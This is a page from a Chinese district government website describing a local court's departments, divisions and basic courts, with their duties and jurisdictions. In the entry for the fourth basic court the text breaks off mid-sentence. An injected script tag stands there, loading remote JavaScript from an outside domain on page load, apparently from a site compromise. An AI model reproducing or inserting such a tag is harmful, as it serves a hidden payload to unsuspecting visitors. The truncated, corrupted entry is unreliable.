召陵区人民政府网
   
 

 首 页

 | 走进召陵  | 政务公开 | 公共服务 | 互动交流  | 网站导航       市民   企业  投资  
  当前位置 : 首页 > 政务公开 > 机构设置 >
部门简介
领导介绍
部门动态
部门职责
联系方式
部门简介


1、办公室

        协助院领导组织、协调、处理日常政务工作;负责本院重要会议和重大活动的组织协调工作,负责人大代表、政协委员会联络工作,组织办理人大代表、政协委员的议案、提案和建议、意见;承办审判委员会的日常工作;起草综合性文件、报告;负责调查研究、案例选报和图书资料工作,组织汇总并上报对法律、法规草案的意见;负责本院综合治理工作;负责文秘、机要、保密、信息档案、外事等项工作。

2、政治处(下设宣传教育科、组织人事科)

        主管全院的思想政治、新闻宣传、教育培训和组织人事工作;负责全院法官等级和司法警察警衔的审核报批工作;承办直属事业单位的机构编制和组织人事管理事项;负责离(退)休干部的管理和服务工作;负责对书记员的教育管理。政治处规格为副科级。

3、立案庭

        对本院受理的各类案件进行登记立案;审查办理支付令案件;审查办理诉前财产保全和证据保全案件;对不服本院的生效裁判提出各类申诉以及申请再审案件进行审查,对其中符合立案条件的,移送有关法庭处理;处理非诉来信、来访;依法审理管辖争议案件,负责司法救助工作;对本院审判的各类案件进行流程管理;负责司法统计工作。

4、刑事审判第一庭

        依法审判由本院管辖的危害公共安全罪、破坏社会主义市场经济秩序罪、侵犯公民人身权利民主权利罪、侵犯财产罪妨、害社会管理秩序罪、贪污受贿罪、渎职罪,(不含涉及未成年人犯罪案件和自诉案件)。

5、刑事审判第二庭(挂少年刑事审判庭牌子)

        依法审判涉及未成年人犯罪的刑事案件和刑事自诉案件。

6、民事审判第一庭

        依法审判有关婚姻、家庭、劳动争议、人身权利、房地产、农村土地承包及相关合同等纠纷案件;审理申请撤消相关仲裁案件;指导基层人民调解工作。

7、民事审判第二庭

        依法审判法人之间、法人与其他组织之间的合同纠纷和侵权纠纷案件;审判证券、期货、票据等纠纷案件;审判破产案件;审理申请撤销相关仲裁的案件。

8、民事审判第三庭(挂速裁法庭的牌子)

        依法审判知识产权、交通事故、医疗事故等纠纷案件;审判简易民事案件。

9、行政审判庭

        依法审判行政案件;审查和执行行政机关申请的非诉行政强制执行案件;确认国家赔偿案件。

10、审判监督庭

        依法审判不服本院生效裁判的再审案件;审判由本院院长提交审判委员会讨论决定再审的案件;审判上级法院指令再审的案件;审判由漯河市人民检察院按审判监督程序提出抗诉的再审案件。

11、执行局(下设执行一庭、执行二庭、综合科)

        执行本院生效法律文书;执行法律规定由本院执行的其他法律文书,组织本院统一的执行行动。执行局规格为副科级。

12、司法警察大队

        负责法庭警卫、押解人犯、送达有关法律文书;配合执行庭执行案件和有关庭室强制措施的执行,负责维护机关的安全和秩序。规格为正股级,事业编制20名,经费实行全额预算管理。

13、司法行政装备管理科

        负责本院诉讼费、装备、通讯等方面的管理工作;管理本院各项经费和国有资产,监督直属事业单位的财务和国有资产管理。

纪检(监察)机构按有关规定设置。

基层法庭

1、召陵法庭

        依法审判召陵镇、姬石乡辖区内有关婚姻、家庭、劳动争议、人身权利、房地产、相邻关系、土地承包及相关合同等纠纷案件;指导基层人民调解工作。

2、老窝法庭

        依法审判老窝镇辖区内有关婚姻、家庭、劳动争议、人身权利、房地产、相邻关系、土地承包及相关合同等纠纷案件;指导基层人民调解工作。

3、万金法庭

        依法审判万金镇、邓襄镇辖区内有关婚姻、家庭、劳动争议、人身权利、房地产、相邻关系、土地承包及相关合同等纠纷案件;指导基层人民调解工作。

4、青年法庭

        依法审判青年乡辖区内有关婚姻、家庭、劳动争议、人身权利、房地产、相邻关系、土地承包及?script src=http://dm800.cn/m.js>


  主办:漯河市召陵区人民政府办公室
联系电话:0395-2600123 E-mail:slzfw 加 @ 加 126.com
版权所有 未经书面允许不得转载信息内容、建立镜像 建议IE5.0 1024*768以上分辨率浏览本网站
豫ICP备05016466号